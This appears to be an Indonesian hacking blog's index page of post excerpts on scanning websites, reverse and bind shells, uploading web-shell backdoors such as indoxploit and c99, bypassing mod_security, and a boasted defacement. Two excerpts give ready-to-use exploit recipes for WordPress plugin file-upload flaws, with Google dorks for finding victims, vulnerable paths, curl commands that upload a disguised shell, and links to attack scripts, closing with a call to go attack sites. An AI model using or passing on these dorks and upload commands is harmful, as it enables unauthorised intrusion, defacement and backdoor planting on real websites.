ANONIMCYBER | Haloo sobat apa kabar! disini saya akan membahas langkah langkah Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux pastinya sobat hacking atau cracking butuh mencari kelemahan suatu...
Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user...
Assalamualaikum. Haloooo, sudah lama tidak posting kembali, maaf karena saya sendiri sudah sibuk oleh kegiatan dunia nyata :v. Oke langsung saja, ke inti dari artikel ini.Melacak nomor telpon? Ingin cari tau...
Halo, kali ini saya akan membagikan sebuah tools sederhana yang digunakan untuk Information Gathering sebuah website. Tools ini akan otomatis mengambil informasi:- IP Address- Hostname- NameServer & Mail Server- Scan Range...
Halo, selamat malam. Kali ini gua mau sharing lagi gimana socket server.Masih inget gimana kemarin Meme Comic Indonesia (MCI) kena deface di PORT 1337?Yap, gua pake metode ini.Oke langsung aja.Sebelumnya untuk...
Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.Disini, saya...
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.Mudah saja untuk...
Wappalyzer adalah utilitas lintas platform yang mengungkap teknologi yang digunakan di situs web. Ini mendeteksi sistem pengelolaan konten, platform e-niaga, kerangka web, perangkat lunak server, alat analisis dan banyak lagi.Dengan ini...
Haloo, selamat malammm.Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell...
Exploit Title: WordPress Plugin Job Manager File UploadGoogle Dork: inurl:/wp-content/uploads/job-manager-uploads/Vuln Path: /jm-ajax/upload_fileExample:www.target.com/jm-ajax/upload_file/( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"Upload file anda dengan format .gif/.jpg/.pngScript:- https://pastebin.com/hp0jJr1g [PHP][CLI Based]- https://pastebin.com/FaACEDLg [BASH]Ayo kawan kita boom...
Exploit Title: WordPress Business Directory Plugin File UploadAuthor: Jingklong ( Bahari Trouble Maker )Google Dork: inurl:/wp-content/ inurl:/business-directory-pluginVuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-uploadExample Target:http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"Uplod file...
Oke kali ini gua akan share tips tentang cara simple membypass command yang di blokir oleh mod_security. Pernah denger bukan?ModSecurity merupakanmodul dari apache yang merupakan salah satu web server yang paling...
Okee, berhubung banyak yang request tentang tools "symlink" dengan shell indoxploit. Kebetulan belakangan ini gua lagi sibuk, jadi ya udah gua share teknik ini dulu yaa. nanti akan gua update di...
